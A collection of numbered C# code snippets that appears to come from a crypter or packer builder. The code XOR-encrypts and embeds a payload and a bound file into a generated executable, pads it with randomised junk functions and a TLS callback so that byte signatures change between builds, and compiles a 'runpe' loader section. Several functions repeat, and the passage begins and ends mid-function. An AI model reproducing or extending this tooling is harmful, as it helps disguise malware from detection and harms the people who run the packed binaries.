                    //Array.Resize(ref func_buffer, func_buffer.Length + pad_len);

                    TxtSect      = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
                    // The recorded size uses the actual buffer length, not the requested func_len.
                    size_pre_ep += func_buffer.Length;
                }
            }

            JCI.SIZE_PRE_EP_FUNCTIONS = size_pre_ep;

            // ep -
            {
                int index_of = TxtSect.IndexOf(";[EP_FUNCTION]");
                if (index_of > -1)
                {
                    int    func_len    = Rand.Next(0x120, 0x140); // const
                    byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);

                    // pad entropy with zeros after func
                    //int pad_len = Rand.Next(0x10, 0x25);
                    //Array.Resize(ref func_buffer, func_buffer.Length + pad_len);

                    TxtSect  = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
                    size_ep += func_buffer.Length;
                }
            }

            JCI.SIZE_EP_FUNCTION = size_ep;

            ////  post - ep
            for (int i = 0; i < post_ep_func_cnt; i++)
            {
                int index_of = TxtSect.IndexOf(";[POST_EP_FUNCTIONS]");
                if (index_of > -1)
                {
                    int func_len = Rand.Next(0x120, 0x200);

                    byte[] func_buffer;

                    if (Rand.NextDouble() >= 0.5)
                    {
                        func_buffer = new DataConstructor().GenData(func_len, func_len);
                    }
                    else
                    {
                        func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
                    }
                    // Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer));

                    // pad entropy with zeros after func
                    //int pad_len = Rand.Next(0x10, 0x25);
                    //Array.Resize(ref func_buffer, func_buffer.Length + pad_len);

                    TxtSect       = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
                    size_post_ep += func_buffer.Length;
                }
            }

            JCI.SIZE_POST_EP_FUNCTIONS = size_post_ep;

            // PAD ENTROPY
            //int size_of_entropy_pad = 0x200; ;// ALIGN_UP(Rand.Next(0x200, 0x1000), (int)PE.NtHeader.OptionalHeader.FileAlignment);

            //byte[] zero_fill = new byte[0x1000];
            //string path_inc = Path.Combine(PE.PeDirectory.IncludeDirectory, "zerofill.bin");
            //path_inc.WriteFile(zero_fill);

            // JCI.SIZE_ENTROPY_PAD = (size_of_entropy_pad * 2);

            if (File.Exists(PE.PeDirectory.TextSectionPath))
            {
                File.Delete(PE.PeDirectory.TextSectionPath);
            }

            // The expanded source replaces the original file, written as ASCII.
            PE.PeDirectory.TextSectionPath.WriteText(TxtSect, StringEncoding.ASCII);

            GC.Collect();
        }
Esempio n. 18
        /// <summary>
        /// Runs the external compiler at <c>PE.PeDirectory.CompilerPath</c> on <paramref name="PathName"/>
        /// with <c>-f bin</c> output directed to a newly created temp file.
        /// </summary>
        /// <param name="PathName">Source file handed to the compiler.</param>
        /// <param name="PE">Build context supplying the include root and the compiler path.</param>
        /// <returns>The temp-file path, or <c>null</c> when that file does not exist afterwards.</returns>
        /// <remarks>
        /// <c>Path.GetTempFileName()</c> creates the file before the compiler runs, so the existence
        /// check does not by itself show that compilation succeeded. The child is started without a
        /// shell; its stdout is drained and discarded and its exit code is never read.
        /// </remarks>
        public static string CompileArbitrary(string PathName, NewPE PE)
        {
            string outputPath = Path.GetTempFileName();

            ProcessStartInfo startInfo = new ProcessStartInfo
            {
                Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"",
                                          PE.PeDirectory.RootDirectoryPath,
                                          PathName,
                                          outputPath),
                FileName               = PE.PeDirectory.CompilerPath,
                RedirectStandardOutput = true,
                UseShellExecute        = false
            };

            using (Process compiler = Process.Start(startInfo))
            using (StreamReader compilerOutput = compiler.StandardOutput)
            {
                // Read to end-of-stream so the redirected pipe is emptied; the text is not used.
                compilerOutput.ReadToEnd();
            }

            return File.Exists(outputPath) ? outputPath : null;
        }
Esempio n. 19
 /// <summary>Compiles the section registered under the key "bss" by delegating to <c>CompileSection</c>.</summary>
 /// <param name="PE">Build context passed through unchanged.</param>
 public static void CompileTLSSection(NewPE PE) => CompileSection("bss", PE);
Esempio n. 20
        /// <summary>
        /// Replaces the section header named <paramref name="Name"/> in <c>PE.Sections</c> with
        /// <paramref name="NewSection"/>, keeping its position in the list.
        /// </summary>
        /// <remarks>The node returned by <c>Find</c> is used without a null check, so the section must exist.</remarks>
        private static void ReplaceSectionByName(string Name, PE_SECTION_HEADER NewSection, NewPE PE)
        {
            // Look the current header up by name, then overwrite the list node that holds it.
            PE.Sections.Find(GetSectionByName(Name, PE)).Value = NewSection;
        }
Esempio n. 21
 /// <summary>
 /// Returns the first file in <c>PE.PeDirectory.ObjDirectory</c> whose name without extension equals
 /// <paramref name="Name"/> with its leading and trailing dots removed.
 /// </summary>
 /// <param name="Name">Section name, e.g. ".text".</param>
 /// <param name="PE">Build context supplying the object directory.</param>
 /// <returns>The matching path, or <c>null</c> when no file matches.</returns>
 private static string GetObjPathFromSectionName(string Name, NewPE PE)
 {
     string[] objectFiles = Directory.GetFiles(PE.PeDirectory.ObjDirectory);

     return objectFiles.FirstOrDefault(candidate => Path.GetFileNameWithoutExtension(candidate) == Name.Trim('.'));
 }
Esempio n. 22
 /// <summary>
 /// When <paramref name="_RemoveAntiDebug"/> is true, replaces the include file at
 /// <c>PE.PeDirectory.AntiDebugIncPath</c> with an empty file; otherwise does nothing.
 /// </summary>
 /// <param name="PE">Build context that supplies the include path.</param>
 /// <param name="_RemoveAntiDebug">Whether to blank the include.</param>
 public static void RemoveAntiDebug(NewPE PE, bool _RemoveAntiDebug)
 {
     if (!_RemoveAntiDebug)
     {
         return;
     }

     // Delete-then-write leaves a zero-length file where the previous include was.
     File.Delete(PE.PeDirectory.AntiDebugIncPath);
     File.WriteAllText(PE.PeDirectory.AntiDebugIncPath, string.Empty);
 }
Esempio n. 23
        /// <summary>
        /// Maps <paramref name="SectionName"/> to a source/object path pair from <c>_PE.PeDirectory</c>, deletes any
        /// existing object file, and runs the external compiler with <c>-f bin</c> to produce a new one.
        /// </summary>
        /// <param name="SectionName">One of "text", "data", "idata", "bss", "runpe" or "main".</param>
        /// <param name="_PE">Build context supplying all paths and the compiler location.</param>
        /// <remarks>
        /// NOTE(review): an unrecognised name falls through to empty paths and the compiler is still
        /// launched with empty input and output arguments. Compiler stdout is drained and discarded,
        /// the exit code is never read, and nothing checks that the object file was produced.
        /// </remarks>
        private static void CompileSection(string SectionName, NewPE _PE)
        {
            string SectionSourcePath;
            string SectionObjPath;

            switch (SectionName)
            {
            case "text":
                SectionSourcePath = _PE.PeDirectory.TextSectionPath;
                SectionObjPath    = _PE.PeDirectory.TextObjectPath;
                break;

            case "data":
                SectionSourcePath = _PE.PeDirectory.DataSectionPath;
                SectionObjPath    = _PE.PeDirectory.DataObjectPath;
                break;

            case "idata":
                SectionSourcePath = _PE.PeDirectory.IDataSectionPath;
                SectionObjPath    = _PE.PeDirectory.IDataObjectPath;
                break;

            // The "bss" key selects the TLS section paths.
            case "bss":
                SectionSourcePath = _PE.PeDirectory.TLSSectionPath;
                SectionObjPath    = _PE.PeDirectory.TLSObjectPath;
                break;

            case "runpe":
                SectionSourcePath = _PE.PeDirectory.RunPESectionPath;
                SectionObjPath    = _PE.PeDirectory.RunPEObjectPath;
                break;

            // "main" is the final link step: its output path is SavePath rather than an object file.
            case "main":
                SectionSourcePath = _PE.PeDirectory.MainPath;
                SectionObjPath    = _PE.PeDirectory.SavePath;
                break;

            default:
                SectionSourcePath = string.Empty;
                SectionObjPath    = string.Empty;
                break;
            }


            if (File.Exists(SectionObjPath))
            {
                File.Delete(SectionObjPath);
            }

            ProcessStartInfo psi = new ProcessStartInfo();

            // Paths are wrapped in double quotes but not escaped; a path containing a quote would split the arguments.
            psi.Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"",
                                          _PE.PeDirectory.RootDirectoryPath,
                                          SectionSourcePath,
                                          SectionObjPath);

            psi.FileName = _PE.PeDirectory.CompilerPath;
            psi.RedirectStandardOutput = true;
            // Required for stdout redirection; the compiler is started directly, not through a shell.
            psi.UseShellExecute        = false;

            using (Process Proc = Process.Start(psi))
            {
                using (StreamReader sReader = Proc.StandardOutput)
                {
                    // Reading to end-of-stream empties the redirected pipe; res is not used afterwards.
                    string res = sReader.ReadToEnd();
                }
            }
        }
Esempio n. 24
 /// <summary>Compiles the section registered under the key "bss" by delegating to <c>CompileSection</c>.</summary>
 /// <param name="PE">Build context passed through unchanged.</param>
 public static void CompileTLSSection(NewPE PE) => CompileSection("bss", PE);
Esempio n. 25
 /// <summary>Compiles the entry registered under the key "main" by delegating to <c>CompileSection</c>.</summary>
 /// <param name="PE">Build context passed through unchanged.</param>
 public static void CompileMain(NewPE PE) => CompileSection("main", PE);
Esempio n. 26
 /// <summary>Compiles the section registered under the key "runpe" by delegating to <c>CompileSection</c>.</summary>
 /// <param name="PE">Build context passed through unchanged.</param>
 public static void CompileRunPESection(NewPE PE) => CompileSection("runpe", PE);
Esempio n. 27
 /// <summary>Compiles the section registered under the key "idata" by delegating to <c>CompileSection</c>.</summary>
 /// <param name="PE">Build context passed through unchanged.</param>
 public static void CompileIDataSection(NewPE PE) => CompileSection("idata", PE);
Esempio n. 28
 /// <summary>Compiles the section registered under the key "text" by delegating to <c>CompileSection</c>.</summary>
 /// <param name="PE">Build context passed through unchanged.</param>
 public static void CompileTextSection(NewPE PE) => CompileSection("text", PE);
Esempio n. 29
        /// <summary>
        /// Transforms the file at <paramref name="PayloadPath"/> with a fresh 16-byte key, Base64-encodes it, and
        /// writes three files into the include directory: <c>payload_length.inc</c>, <c>payload_key.bin</c>
        /// and <c>payload.bin</c>.
        /// </summary>
        /// <param name="PE">Build context supplying the include directory.</param>
        /// <param name="PayloadPath">File whose bytes are transformed and encoded.</param>
        /// <remarks>
        /// For analysts: the key is written unprotected to <c>payload_key.bin</c> beside the encoded data, so
        /// the original bytes are recoverable by anyone holding both; treat this as obfuscation, not encryption.
        /// </remarks>
        public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath)
        {
            byte[] pKey = new byte[16];
            // Keys.PopulateBuffer is defined elsewhere; presumably it fills the buffer with random bytes — verify.
            Keys.PopulateBuffer(pKey);

            byte[] pFileBuffer = PayloadPath.ReadBytes();
            // By its name a XOR transform applied to pFileBuffer in place — verify against Xor's definition.
            Xor.EncodeDecodeData(pFileBuffer, pKey);

            // Base64 text is pure ASCII, so the ASCII encoder is lossless here.
            pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer));

            string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc");
            string Format = "PAYLOAD_LENGTH EQU 0x{0}";
            // PAYLOAD_LENGTH is the length of the Base64 text, not of the original file.
            Format = string.Format(Format, pFileBuffer.Length.ToString("X8"));

            if (File.Exists(PayloadLengthInclude))
                File.Delete(PayloadLengthInclude);

            File.WriteAllText(PayloadLengthInclude, Format);

            string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin");
            string PayloadInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin");

            if (File.Exists(PayloadKeyInclude))
                File.Delete(PayloadKeyInclude);

            if (File.Exists(PayloadInclude))
                File.Delete(PayloadInclude);

            File.WriteAllBytes(PayloadKeyInclude, pKey);
            File.WriteAllBytes(PayloadInclude, pFileBuffer);
        }
        /// <summary>
        /// Rewrites <c>tls_callback.inc</c>, replacing its marker lines with generated filler bytes, then
        /// records the compiled size in <paramref name="JCI"/> and writes <c>payload_address.inc</c>.
        /// </summary>
        /// <param name="PE">Build context supplying the include directory.</param>
        /// <param name="JCI">Size bookkeeping; <c>SIZE_TLS_CALLBACK</c> is written, the other three sizes are read.</param>
        /// <param name="Multiplier">Scales how many generated functions follow a <c>;[JUNK_FUNCS]</c> marker (3x to 5x).</param>
        /// <remarks>
        /// For analysts: filler lengths and counts come from <c>Rand</c>, so these regions are expected
        /// to differ between builds and byte signatures over them are unlikely to be stable.
        /// </remarks>
        public void WriteLogicalTrashToTLSCallback(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
        {
            string TlsCallbackInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback.inc");
            // This first size is overwritten after the rewrite below and never read before that.
            int sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
            // Accumulated below but not read anywhere in this method.
            int size_junk_added = 0;

            string[] tls = TlsCallbackInc.ReadLines();

            for (int i = 0; i < tls.Length; i++)
            {
                // The marker line is replaced wholesale by the filler rendered as assembler text.
                if (tls[i].Contains(";[JUNK_NO_PRESERVE]"))
                {
                    int len_trash = Rand.Next(0x100, 0x200);
                    byte[] trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
                    size_junk_added += trash_buffer.Length;

                    tls[i] = trash_buffer.ToASMBuffer();

                    trash_buffer = new byte[0];
                    GC.Collect();
                }

                // Here the marker line is kept and the generated functions are appended after it.
                if (tls[i].Contains(";[JUNK_FUNCS]"))
                {
                    int xx = Rand.Next(3 * Multiplier, 5 * Multiplier);

                    for (int jj = 0; jj < xx; jj++)
                    {
                        int func_len = Rand.Next(0x100, 0x120);
                        byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x1000);

                        tls[i] = string.Concat(tls[i], Environment.NewLine, func_buffer.ToASMBuffer(), Environment.NewLine);
                    }
                }

            }

            if (File.Exists(TlsCallbackInc))
                File.Delete(TlsCallbackInc);

            TlsCallbackInc.WriteLines(tls);

            // Re-measure the include now that the markers have been expanded.
            sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
            JCI.SIZE_TLS_CALLBACK = sizeOfTLS + 3; // prologue;

            string AddrPayloadInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_address.inc");
            string Format = "PAYLOAD_ADDRESS EQU 0x{0}";
            // PAYLOAD_ADDRESS is the sum of the four recorded code sizes, as 8 hex digits.
            Format = string.Format(Format, (JCI.SIZE_PRE_EP_FUNCTIONS + JCI.SIZE_TLS_CALLBACK + JCI.SIZE_EP_FUNCTION + JCI.SIZE_POST_EP_FUNCTIONS).ToString("X8"));
            File.WriteAllText(AddrPayloadInc, Format);

            GC.Collect();
        }
Esempio n. 31
        /// <summary>
        /// Transforms the file at <paramref name="BindPath"/> with the key bytes read from
        /// <c>PE.PeDirectory.PayloadKeyIncPath</c>, Base64-encodes the result and writes it to
        /// <c>PE.PeDirectory.BindIncPath</c>.
        /// </summary>
        /// <param name="PE">Build context supplying the key path and the output path.</param>
        /// <param name="BindPath">File whose bytes are transformed and encoded.</param>
        /// <remarks>
        /// For analysts: the key is read from a file on disk rather than generated here, so the bound
        /// file shares its key with whatever wrote that key file; Base64 plus a repeating-key
        /// transform is reversible once the key is recovered.
        /// </remarks>
        public static void EncryptAndEncodeBind(NewPE PE, string BindPath)
        {
            byte[] pKey = PE.PeDirectory.PayloadKeyIncPath.ReadBytes();
            byte[] pBind = BindPath.ReadBytes();

            // By its name a XOR transform applied to pBind in place — verify against Xor's definition.
            Xor.EncodeDecodeData(pBind, pKey);
            // Base64 text is pure ASCII, so the ASCII encoder is lossless here.
            pBind = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pBind));

            if (File.Exists(PE.PeDirectory.BindIncPath))
                File.Delete(PE.PeDirectory.BindIncPath);

            File.WriteAllBytes(PE.PeDirectory.BindIncPath, pBind);
        }
Esempio n. 32
 /// <summary>
 /// Replaces the section header named <paramref name="Name"/> in <c>PE.Sections</c> with
 /// <paramref name="NewSection"/>, keeping its position in the list.
 /// </summary>
 /// <remarks>The node returned by <c>Find</c> is used without a null check, so the section must exist.</remarks>
 private static void ReplaceSectionByName(string Name, PE_SECTION_HEADER NewSection, NewPE PE)
 {
     // Look the current header up by name, then overwrite the list node that holds it.
     PE.Sections.Find(GetSectionByName(Name, PE)).Value = NewSection;
 }
Esempio n. 33
        /// <summary>
        /// Appends to the main assembler file at <c>PE.PeDirectory.MainPath</c> an alignment directive and then,
        /// for each section, a label, an <c>incbin</c> of that section's object file and another alignment directive.
        /// </summary>
        /// <param name="PE">Build context supplying the main file path, the section list and <c>FileAlignment</c>.</param>
        /// <remarks>
        /// NOTE(review): <c>GetObjPathFromSectionName</c> can return null when no object file matches;
        /// the result is passed to <c>Path.GetFileName</c> unchecked, so the emitted <c>incbin</c> path would then
        /// be just <c>obj/</c> — verify that callers compile every section first.
        /// </remarks>
        public static void AddSectionDatas(NewPE PE)
        {
            File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
            // Pad with zero bytes up to the next FileAlignment boundary.
            File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
            File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);

            foreach (PE_SECTION_HEADER SectionHeader in PE.Sections)
            {
                // Label is the section name without its leading dot, upper-cased, e.g. ".text" gives "TEXT:".
                string WriteableName = string.Concat(new string(SectionHeader.Name).TrimStart('.').ToUpper(), ":");

                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
                File.AppendAllText(PE.PeDirectory.MainPath, WriteableName);
                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
                File.AppendAllText(PE.PeDirectory.MainPath, string.Format(
                                                                        "\tincbin \"obj/{0}\"",
                                                                        Path.GetFileName(GetObjPathFromSectionName(new string(SectionHeader.Name), PE))));
                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
                File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
            }
        }
Esempio n. 34
 /// <summary>Compiles the section registered under the key "idata" by delegating to <c>CompileSection</c>.</summary>
 /// <param name="PE">Build context passed through unchanged.</param>
 public static void CompileIDataSection(NewPE PE) => CompileSection("idata", PE);
Esempio n. 35
 /// <summary>
 /// Returns the first header in <c>PE.Sections</c> whose <c>Name</c> characters spell exactly <paramref name="Name"/>.
 /// </summary>
 /// <param name="Name">Full section name including the leading dot, e.g. ".text".</param>
 /// <param name="PE">Image description holding the section list.</param>
 /// <returns>The matching header, or the default value of <c>PE_SECTION_HEADER</c> when none matches.</returns>
 public static PE_SECTION_HEADER GetSectionByName(string Name, NewPE PE)
 {
     // The char[] name is turned into a string so the comparison is by content, not by reference.
     return PE.Sections.FirstOrDefault(candidate => new string(candidate.Name) == Name);
 }
Esempio n. 36
 /// <summary>
 /// Returns the first header in <c>PE.Sections</c> whose <c>Name</c> characters spell exactly <paramref name="Name"/>.
 /// </summary>
 /// <param name="Name">Full section name including the leading dot, e.g. ".text".</param>
 /// <param name="PE">Image description holding the section list.</param>
 /// <returns>The matching header, or the default value of <c>PE_SECTION_HEADER</c> when none matches.</returns>
 public static PE_SECTION_HEADER GetSectionByName(string Name, NewPE PE)
 {
     // The char[] name is turned into a string so the comparison is by content, not by reference.
     return PE.Sections.FirstOrDefault(candidate => new string(candidate.Name) == Name);
 }
Esempio n. 37
 /// <summary>Compiles the section registered under the key "text" by delegating to <c>CompileSection</c>.</summary>
 /// <param name="PE">Build context passed through unchanged.</param>
 public static void CompileTextSection(NewPE PE) => CompileSection("text", PE);
Esempio n. 38
        /// <summary>
        /// Recomputes the virtual layout of the .text, .idata and .data section headers
        /// (plus .bss when the TLS symbol is defined), writes the resulting addresses to
        /// <c>section_addresses.inc</c>, rebuilds the sections and stores the headers back.
        /// </summary>
        /// <param name="PE">Build context supplying the headers, alignment values and file paths.</param>
        public static void CalculateSectionHeaders(NewPE PE)
        {
            // Working copies of the headers; they are handed back through ReplaceSectionByName
            // at the end. NOTE(review): this suggests PE_SECTION_HEADER is a value type - confirm.
            PE_SECTION_HEADER shText = GetSectionByName(".text", PE);
            PE_SECTION_HEADER shIData = GetSectionByName(".idata", PE);
            PE_SECTION_HEADER shData = GetSectionByName(".data", PE);

#if TLS
            PE_SECTION_HEADER shTLS = GetSectionByName(".bss", PE);
#endif

            // Section sizes are the byte lengths of the object files currently on disk.
            uint sizeOfText = (uint)PE.PeDirectory.TextObjectPath.ReadBytes().Length;
            uint sizeOfIData = (uint)PE.PeDirectory.IDataObjectPath.ReadBytes().Length;
            uint sizeOfData = (uint)PE.PeDirectory.DataObjectPath.ReadBytes().Length;

#if TLS
            uint sizeOfTLS = (uint)PE.PeDirectory.TLSObjectPath.ReadBytes().Length;
#endif

            /* COMPUTE TEXT */
            // The first section is placed one SectionAlignment unit into the image.
            shText.VirtualSize = sizeOfText;
            shText.VirtualAddress = PE.NtHeader.OptionalHeader.SectionAlignment;
            shText.SizeOfRawData = ALIGN_UP(sizeOfText, PE.NtHeader.OptionalHeader.FileAlignment);
            // PointerToRawData is only zeroed in this method, for every section.
            shText.PointerToRawData = 0;

            /* COMPUTE IDATA */
            // Each following section starts at the previous section's address plus that
            // section's raw size rounded up to SectionAlignment.
            shIData.VirtualSize = sizeOfIData;
            shIData.VirtualAddress =
                ((shText.VirtualAddress + ALIGN_UP(shText.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
            shIData.SizeOfRawData = ALIGN_UP(sizeOfIData, PE.NtHeader.OptionalHeader.FileAlignment);
            shIData.PointerToRawData = 0;

            /* COMPUTE DATA */
            shData.VirtualSize = sizeOfData;
            shData.VirtualAddress =
                ((shIData.VirtualAddress + ALIGN_UP(shIData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
            shData.SizeOfRawData = ALIGN_UP(sizeOfData, PE.NtHeader.OptionalHeader.FileAlignment);
            shData.PointerToRawData = 0;

#if TLS
            /* COMPUTE TLS */
            shTLS.VirtualSize = sizeOfTLS;
            shTLS.VirtualAddress =
                ((shData.VirtualAddress + ALIGN_UP(shData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
            shTLS.SizeOfRawData = ALIGN_UP(sizeOfTLS, PE.NtHeader.OptionalHeader.FileAlignment);
            shTLS.PointerToRawData = 0;
#endif

            // The computed addresses are exported as assembler constants so the section
            // sources can reference each other; the include file is recreated from scratch.
            string SectionHeadersInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "section_addresses.inc");

            if (File.Exists(SectionHeadersInclude))
                File.Delete(SectionHeadersInclude);

#if TLS
            string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
                            "IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
                            "DATA_SECTION_ADDRESS EQU 0x{2}\n" +
                            "TLS_SECTION_ADDRESS EQU 0x{3}\n";

            Format = string.Format(Format,
                                   shText.VirtualAddress.ToString("X8"),
                                   shIData.VirtualAddress.ToString("X8"),
                                   shData.VirtualAddress.ToString("X8"),
                                   shTLS.VirtualAddress.ToString("X8"));
#else
            string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
                            "IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
                            "DATA_SECTION_ADDRESS EQU 0x{2}\n";

            Format = string.Format(Format,
                                   shText.VirtualAddress.ToString("X8"),
                                   shIData.VirtualAddress.ToString("X8"),
                                   shData.VirtualAddress.ToString("X8"));
#endif

            File.WriteAllText(SectionHeadersInclude, Format);

            // Rebuild the sections now that the include file holds the new addresses.
            PEFactory.CompileTextSection(PE);
            PEFactory.CompileIDataSection(PE);
            PEFactory.CompileRunPESection(PE);
            PEFactory.CompileDataSection(PE);

#if TLS
            PEFactory.CompileTLSSection(PE);
#endif

            // Store the updated header copies back into the build context.
            ReplaceSectionByName(".text", shText, PE);
            ReplaceSectionByName(".idata", shIData, PE);
            ReplaceSectionByName(".data", shData, PE);

#if TLS
            ReplaceSectionByName(".bss", shTLS, PE);
#endif
        }
Esempio n. 39
 /// <summary>
 /// Builds the "runpe" source by forwarding to <c>CompileSection</c> with that key.
 /// </summary>
 /// <param name="PE">Build context, passed through unchanged.</param>
 public static void CompileRunPESection(NewPE PE) => CompileSection("runpe", PE);
Esempio n. 40
        /// <summary>
        /// Lays out the .text, .idata and .data sections (and .bss when TLS is defined) back to
        /// back in virtual address space, exports their addresses to <c>section_addresses.inc</c>,
        /// recompiles the section sources and writes the updated headers back into <paramref name="PE"/>.
        /// </summary>
        /// <param name="PE">Build context supplying the headers, alignment values and file paths.</param>
        public static void CalculateSectionHeaders(NewPE PE)
        {
            // Header copies that are modified locally and re-registered at the end of the method.
            PE_SECTION_HEADER shText  = GetSectionByName(".text", PE);
            PE_SECTION_HEADER shIData = GetSectionByName(".idata", PE);
            PE_SECTION_HEADER shData  = GetSectionByName(".data", PE);

#if TLS
            PE_SECTION_HEADER shTLS = GetSectionByName(".bss", PE);
#endif

            // Sizes come from the object files as they exist on disk at this point.
            uint sizeOfText  = (uint)PE.PeDirectory.TextObjectPath.ReadBytes().Length;
            uint sizeOfIData = (uint)PE.PeDirectory.IDataObjectPath.ReadBytes().Length;
            uint sizeOfData  = (uint)PE.PeDirectory.DataObjectPath.ReadBytes().Length;

#if TLS
            uint sizeOfTLS = (uint)PE.PeDirectory.TLSObjectPath.ReadBytes().Length;
#endif

            /* COMPUTE TEXT */
            // .text starts at SectionAlignment; raw size is the file-aligned object size.
            shText.VirtualSize      = sizeOfText;
            shText.VirtualAddress   = PE.NtHeader.OptionalHeader.SectionAlignment;
            shText.SizeOfRawData    = ALIGN_UP(sizeOfText, PE.NtHeader.OptionalHeader.FileAlignment);
            // File offsets are not assigned here; every section's PointerToRawData is set to 0.
            shText.PointerToRawData = 0;

            /* COMPUTE IDATA */
            // Address = previous address + previous raw size rounded up to SectionAlignment.
            shIData.VirtualSize    = sizeOfIData;
            shIData.VirtualAddress =
                ((shText.VirtualAddress + ALIGN_UP(shText.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
            shIData.SizeOfRawData    = ALIGN_UP(sizeOfIData, PE.NtHeader.OptionalHeader.FileAlignment);
            shIData.PointerToRawData = 0;

            /* COMPUTE DATA */
            shData.VirtualSize    = sizeOfData;
            shData.VirtualAddress =
                ((shIData.VirtualAddress + ALIGN_UP(shIData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
            shData.SizeOfRawData    = ALIGN_UP(sizeOfData, PE.NtHeader.OptionalHeader.FileAlignment);
            shData.PointerToRawData = 0;

#if TLS
            /* COMPUTE TLS */
            shTLS.VirtualSize    = sizeOfTLS;
            shTLS.VirtualAddress =
                ((shData.VirtualAddress + ALIGN_UP(shData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
            shTLS.SizeOfRawData    = ALIGN_UP(sizeOfTLS, PE.NtHeader.OptionalHeader.FileAlignment);
            shTLS.PointerToRawData = 0;
#endif

            // The include file is deleted and rewritten with one EQU constant per section address.
            string SectionHeadersInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "section_addresses.inc");

            if (File.Exists(SectionHeadersInclude))
            {
                File.Delete(SectionHeadersInclude);
            }

#if TLS
            string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
                            "IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
                            "DATA_SECTION_ADDRESS EQU 0x{2}\n" +
                            "TLS_SECTION_ADDRESS EQU 0x{3}\n";

            Format = string.Format(Format,
                                   shText.VirtualAddress.ToString("X8"),
                                   shIData.VirtualAddress.ToString("X8"),
                                   shData.VirtualAddress.ToString("X8"),
                                   shTLS.VirtualAddress.ToString("X8"));
#else
            string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
                            "IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
                            "DATA_SECTION_ADDRESS EQU 0x{2}\n";

            Format = string.Format(Format,
                                   shText.VirtualAddress.ToString("X8"),
                                   shIData.VirtualAddress.ToString("X8"),
                                   shData.VirtualAddress.ToString("X8"));
#endif

            File.WriteAllText(SectionHeadersInclude, Format);

            // Recompile every section against the freshly written address constants.
            PEFactory.CompileTextSection(PE);
            PEFactory.CompileIDataSection(PE);
            PEFactory.CompileRunPESection(PE);
            PEFactory.CompileDataSection(PE);

#if TLS
            PEFactory.CompileTLSSection(PE);
#endif

            // Re-register the modified header copies under their section names.
            ReplaceSectionByName(".text", shText, PE);
            ReplaceSectionByName(".idata", shIData, PE);
            ReplaceSectionByName(".data", shData, PE);

#if TLS
            ReplaceSectionByName(".bss", shTLS, PE);
#endif
        }
Esempio n. 41
 /// <summary>
 /// Builds the top-level source by forwarding to <c>CompileSection</c> with the "main" key.
 /// </summary>
 /// <param name="PE">Build context, passed through unchanged.</param>
 public static void CompileMain(NewPE PE) => CompileSection("main", PE);
Esempio n. 42
        /// <summary>
        /// Recreates <c>tls_callback_offset.inc</c> with a single <c>TLS_CALLBACK_OFFSET</c> constant
        /// and then rebuilds the data section.
        /// </summary>
        /// <param name="PE">Build context supplying the include directory and the junk-size counters.</param>
        /// <remarks>
        /// The offset is the sum of <c>SIZE_PRE_EP_FUNCTIONS</c> and <c>SIZE_EP_FUNCTION</c>, written as
        /// eight hexadecimal digits. Analysis note: a TLS callback runs before the image entry point,
        /// so a reviewer of the produced binary should inspect the TLS directory as well as
        /// <c>AddressOfEntryPoint</c>.
        /// </remarks>
        public static void ConstructTLSCallback(NewPE PE)
        {
            string offsetIncPath = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback_offset.inc");

            // Start from an empty file so the append below yields exactly one line.
            if (File.Exists(offsetIncPath))
            {
                File.Delete(offsetIncPath);
            }

            var callbackOffset = PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS + PE.JunkInfo.SIZE_EP_FUNCTION;
